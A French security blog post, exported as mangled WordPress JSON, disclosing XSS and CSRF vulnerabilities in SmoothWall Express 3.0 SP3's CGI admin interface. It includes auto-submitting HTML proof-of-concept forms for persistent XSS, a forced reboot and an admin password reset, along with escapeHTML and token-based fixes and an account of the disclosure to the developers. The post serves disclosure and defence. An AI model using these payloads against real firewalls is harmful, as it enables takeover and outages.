Pour continuer mes r\u00e9centes analyses de divers firewall\/routeurs r\u00e9put\u00e9s (pfSense<\/a>, m0n0wall<\/a>…), je me suis int\u00e9ress\u00e9 \u00e0 celle-ci. Contrairement \u00e0 ses cousines, SmoothWall s’av\u00e8re relativement robuste \u00e0 part sur certains points pr\u00e9cis.<\/p>\n Le 17 \u00a0janvier 2011, Dave B. a publi\u00e9 deux PoC concernant une XSS et une CSRF pour SmoothWall 3.0<\/a> (probablement SP2).\u00a0La derni\u00e8re version de SmoothWall Express est la 3.0 SP3, \u00a0qui date du 1er juin 2011, et il s’av\u00e8re que ces deux PoC sont toujours fonctionnels. J’ai entrepris de tester un peu plus en profondeur cette distribution, et d’autres PoC en ont r\u00e9sult\u00e9 : diverses CSRF, XSS persistantes et non-persistantes au travers de l’interface d’administration WebGUI (Perl\/CGI).<\/p>\n SmoothWall dispose d’une authentification simple de type Basic Auth (htaccess) pour g\u00e9rer l’interface web d’administration. Aucun m\u00e9canisme de cookie de session, de jeton, ni m\u00eame de validation de referer n’est pr\u00e9sent pour\u00a0parer\u00a0la distribution \u00e0 des attaques de type CSRF. Le fichier \/var\/smoothwall\/auth\/user contient les cr\u00e9dentiels d’acc\u00e8s \u00e0 l’authentification Basic Auth. Deux comptes sont pr\u00e9sents par d\u00e9faut, le compte “admin” et le compte “dial”.<\/p>\n Fichier concern\u00e9 :\u00a0\/httpd\/cgi-bin\/pppsetup.cgi \u00e0 la ligne 365 :<\/p>\n [perl]print &amp;amp;amp;quot;\\t$profilenames[$c]\\n&amp;amp;amp;quot;;[\/perl]<\/p>\n La variable $profilenames[$c] n’est pas correctement nettoy\u00e9e (sanitize<\/em>). PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> XSS persistante pppsetup.cgi<\/p><\/div>\n Cette XSS s’av\u00e8re persistante \u00e0 deux endroits. Le premier est sur la page elle-m\u00eame, puisque c’est le nom d’un nouveau profil cr\u00e9\u00e9 qui comporte l’injection. A chaque chargement de la page la liste des profils disponibles est faites. Le second lieu o\u00f9 l’injection est visible est dans la page \/httpd\/cgi-bin\/logs.cgi\/log.dat, qui conserve une trace de tous les\u00a0\u00e9v\u00e9nements\u00a0de configuration, dont l’ajout d’un nouveau profil. Pour la journalisation, c’est la ligne suivante du fichier pppsetup.cgi qui est concern\u00e9e (plusieurs occurrences) :<\/p>\n [perl]&amp;amp;amp;amp;log(&amp;amp;amp;quot;$tr{‘profile deleted’} $pppsettings{‘PROFILENAME’}&amp;amp;amp;quot;);[\/perl]<\/p>\n XSS persistante dans les logs<\/p><\/div>\n La seconde page vuln\u00e9rable \u00e0 une XSS persistante est\u00a0\/httpd\/cgi-bin\/vpn.cgi\/vpnconfig.dat \u00e0 la ligne 258 :<\/p>\n [perl]&amp;amp;amp;lt;td colspan=’3’&amp;amp;amp;gt;&amp;amp;amp;lt;strong&amp;amp;amp;gt;$tr{‘commentc’}&amp;amp;amp;lt;\/strong&amp;amp;amp;gt; $temp[8]&amp;amp;amp;lt;\/td&amp;amp;amp;gt;[\/perl]<\/p>\n La variable $temp[8] est r\u00e9inject\u00e9e sans nettoyage. PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> XSS persistante dans la configuration VPN<\/p><\/div>\n Une autre page vuln\u00e9rable \u00e0 une XSS persistante est\u00a0\/httpd\/cgi-bin\/ddns.cgi \u00e0 la ligne 273 :<\/p>\n [perl]&amp;amp;amp;amp;displaytable($filename, \\%render_settings, $cgiparams{‘ORDER’}, $cgiparams{‘COLUMN’} );[\/perl]<\/p>\n Toutes les variables POST sont transmises sans nettoyage \u00e0 la fonction displaytable(). Aucun traitement additionnel n’est fait dans cette fonction. La variable COMMENT POST permet l’injection\u00a0persistante.<\/p>\n PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> XSS persistante dans la configuration DDNS<\/p><\/div>\n Une autre page vuln\u00e9rable \u00e0 une XSS persistante est\u00a0\/httpd\/cgi-bin\/ipinfo.cgi \u00e0 la ligne 76 et 101. Ce PoC a \u00e9t\u00e9 initialement r\u00e9alis\u00e9 par Dave B en 2011.<\/p>\n [perl]&amp;amp;amp;amp;openbox(&amp;amp;amp;quot;$addr ($hostname)&amp;amp;amp;quot;);[\/perl]<\/p>\n $addr n’est pas proprement nettoy\u00e9e avant d’\u00eatre r\u00e9inject\u00e9e au travers de la fonction openbox().<\/p>\n PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> XSS non-persistante dans ipinfo<\/p><\/div>\n Ce PoC a \u00e9t\u00e9 initialement r\u00e9alis\u00e9 par Dave B en 2011. Une CSRF permet de red\u00e9marrer ou d’arr\u00eater de force la distribution.<\/p>\n Fichier concern\u00e9 : \/httpd\/cgi-bin\/shutdown.cgi<\/p>\n PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> Cette nouvelle CSRF permet de changer arbitrairement les mots de passe d’administration de l’interface WebGUI. A savoir le compte “admin” et “dial” utilis\u00e9s pour la “Basic Auth”.<\/p>\n Les mots de passe doivent avoir minimum 6 caract\u00e8res et peuvent \u00eatre alpha-num\u00e9riques.<\/p>\n Fichier concern\u00e9 : \/httpd\/cgi-bin\/changepw.cgi<\/p>\n PoC de d\u00e9monstration :<\/p>\n [html]&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/> L’ensemble des XSS, persistantes ou non, peuvent \u00eatre ais\u00e9ment corrig\u00e9es en nettoyant les donn\u00e9es inject\u00e9es dans la page. L’interface WebGUI de SmoothWall repose sur du cgi-bin en Perl. Ainsi, la biblioth\u00e8que CGI peut \u00eatre charg\u00e9e dans les pages :<\/p>\n [perl]use CGI qw(:standard);[\/perl]<\/p>\n Une fois cette biblioth\u00e8que charg\u00e9e, elle permet l’utilisation de la fonction escapeHTML() qui sert \u00e0 nettoyer des donn\u00e9es avant de les r\u00e9injecter dans une page HTML. Pour reprendre le cas du PoC n\u00b01, voici ce qui peut \u00eatre fait pour s’en pr\u00e9munir (line 365 du fichier \/httpd\/cgi-bin\/pppsetup.cgi) :<\/p>\n [perl]print &amp;amp;amp;quot;\\t&amp;amp;amp;lt;OPTION VALUE=’$c’ $selected{‘PROFILE’}{$c}&amp;amp;amp;gt;&amp;amp;amp;quot; . escapeHTML($profilenames[$c]) . &amp;amp;amp;quot;\\n&amp;amp;amp;quot;;[\/perl]<\/p>\n Idem pour les enregistrements dans les logs :<\/p>\n [perl]&amp;amp;amp;amp;log(&amp;amp;amp;quot;$tr{‘profile deleted’} &amp;amp;amp;quot; . escapeHTML($pppsettings{‘PROFILENAME’}));[\/perl]<\/p>\n XSS corrig\u00e9e dans pppsetup<\/p><\/div>\n Enfin, pour se prot\u00e9ger des CSRF, un m\u00e9canisme de jeton de session, ou bien de v\u00e9rification du referer<\/em> HTTP(S) (comme pour le fork<\/em> de SmoothWall du nom d’IPCop) peut \u00eatre impl\u00e9ment\u00e9 sur chacune des pages.<\/p>\n Je tiens \u00e0 saluer les d\u00e9veloppeurs de SmoothWall pour l’utilisation de la fonction system() de Perl qu’ils font de mani\u00e8re s\u00e9curis\u00e9e et dans les r\u00e8gles de l’art.<\/p>\n Toutefois, apr\u00e8s avoir contact\u00e9 l’\u00e9quipe de d\u00e9veloppement de SmoothWall pour savoir ce qu’il en \u00e9tait de ces corrections et leur transmettre ces nouveaux vecteurs d’attaques, ceux-ci m’ont r\u00e9pondu dans un premier temps qu’il ne consid\u00e9raient pas ces injections comme un r\u00e9el probl\u00e8me.<\/p>\n Quelques heures plus tard ils sont revenus sur leurs dires avec un discours un peu plus constructif ; mais caract\u00e9risant ces\u00a0faiblesses\u00a0de “potentielles vuln\u00e9rabilit\u00e9s qui n’en sont pas vraiment”.<\/p>\n J’ai donc r\u00e9pondu avec de nombreuses sources d\u00e9taillant des faits et des failles similaires jug\u00e9es critiques afin de les sensibiliser. J’y ait ajout\u00e9 les techniques pour s\u00e9curiser au mieux les instructions et fonctions vuln\u00e9rables \u00e0 ces vecteurs d’attaques.<\/p>\n Il me parait toutefois anormal qu’une remont\u00e9 de vuln\u00e9rabilit\u00e9s de la sorte, certes qui ne sont pas majeures mais qui doivent \u00eatre prises en consid\u00e9ration, ne soit pas prise au s\u00e9rieux par une \u00e9quipe en charge du maintien d’un produit reconnu et orient\u00e9 s\u00e9curit\u00e9.<\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" SmoothWall est une distribution Linux open-source sous\u00a0licence\u00a0GPL, qui fait office de firewall\/routeur s\u00e9curis\u00e9. R\u00e9f\u00e9rence dans le domaine, et \u00e0 la […]<\/p>\n","protected":false},"author":1337,"featured_media":1140,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[59,517,165,14,515],"tags":[194,200,206,197,332,202,217,203,334,199,335],"class_list":["post-826","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administration-reseaux-et-systemes","category-csrf","category-os","category-vuln-exploit-poc","category-xss","tag-cgi","tag-cross-site-request-forgery","tag-cross-site-scripting","tag-firewall","tag-ipcop","tag-m0n0wall","tag-perl","tag-pfsense","tag-referer","tag-routeur","tag-smoothwall"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/826","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=826"}],"version-history":[{"count":16,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/826\/revisions"}],"predecessor-version":[{"id":1616,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/826\/revisions\/1616"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1140"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=826"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=826"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=826"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Retour en arri\u00e8re…<\/h2>\n
Observations pr\u00e9liminaires<\/h2>\n
Proof Of Concept<\/h2>\n
XSS persistante via requ\u00eate POST n\u00b01<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/pppsetup.cgi’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’PROFILENAME’ value=’&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(\/XSS from Yann CAM\/);&amp;amp;amp;lt;\/script&amp;amp;amp;gt;’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’PROFILE’ value=’1′ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’COMPORT’ value=’ttyS0′ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’DTERATE’ value=’9600′ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’TELEPHONE’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’DIALMODE’ value=’T’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’MAXRETRIES’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’TIMEOUT’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’USERNAME’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’PASSWORD’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’AUTH’ value=’pap-or-chap’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’LOGINSCRIPT’ value=” \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION’ value=’Save’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\n![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_persistent_pppsetup.cgi_-300x246.png\")
<\/a>![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_persistent_logs.cgi_-300x246.png\")
<\/a>XSS persistante via requ\u00eate POST n\u00b02<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/vpn.cgi\/vpnconfig.dat’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’SECRET1′ value=’x’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’SECRET2′ value=’x’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’COMMENT’ value=’&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(\/XSS from Yann CAM\/);&amp;amp;amp;lt;\/script&amp;amp;amp;gt;’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION’ value=’Add’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\n![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_persistent_vpnconfig.cgi_-300x246.png\")
<\/a>XSS persistante via requ\u00eate POST n\u00b03<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/ddns.cgi’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’COMMENT’ value=’&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(\/XSS from Yann CAM\/);&amp;amp;amp;lt;\/script&amp;amp;amp;gt;’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION’ value=’Add’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\n![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_persistent_ddns.cgi_-300x246.png\")
<\/a>XSS non-persistante via requ\u00eate POST n\u00b04<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/ipinfo.cgi’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’IP’ value=’&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(\/XSS from Dave B\/);&amp;amp;amp;lt;\/script&amp;amp;amp;gt;’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION’ value=’Run’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\n![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_non_persistent_ipinfo.cgi_-300x246.png\")
<\/a>CSRF n\u00b01 pour red\u00e9marrer (ou arr\u00eater) SmoothWall<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/shutdown.cgi’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION’ value=’Reboot’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\nCSRF n\u00b02 pour reset les mots de passe d’administration de SmoothWall<\/h3>\n
\n&amp;amp;lt;p&amp;amp;gt;&amp;amp;amp;lt;html&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;form name=’x’ action=’http:\/\/SMOOTHWALL_IP:81\/cgi-bin\/changepw.cgi’ method=’post’&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ADMIN_PASSWORD1′ value=’newpassword’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ADMIN_PASSWORD2′ value=’newpassword’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’DIAL_PASSWORD1′ value=’newpassword’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’DIAL_PASSWORD1′ value=’newpassword’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION_DIAL’ value=’Save’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;input type=’hidden’ name=’ACTION_ADMIN’ value=’Save’ \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/form&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;script&amp;amp;amp;gt;document.forms[‘x’].submit();&amp;amp;amp;lt;\/script&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n &amp;amp;amp;lt;\/body&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;amp;lt;\/html&amp;amp;amp;gt;&amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;<br \/>
\n&amp;amp;lt;p&amp;amp;gt;[\/html]<\/p>\nComment s\u00e9curiser SmoothWall face \u00e0 ces vecteurs d’attaques?<\/h2>\n
![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/smoothwall_xss_protected_pppsetup.cgi_-300x246.png\")
<\/a>Conclusion<\/h2>\n
Sources & ressources<\/h2>\n
\n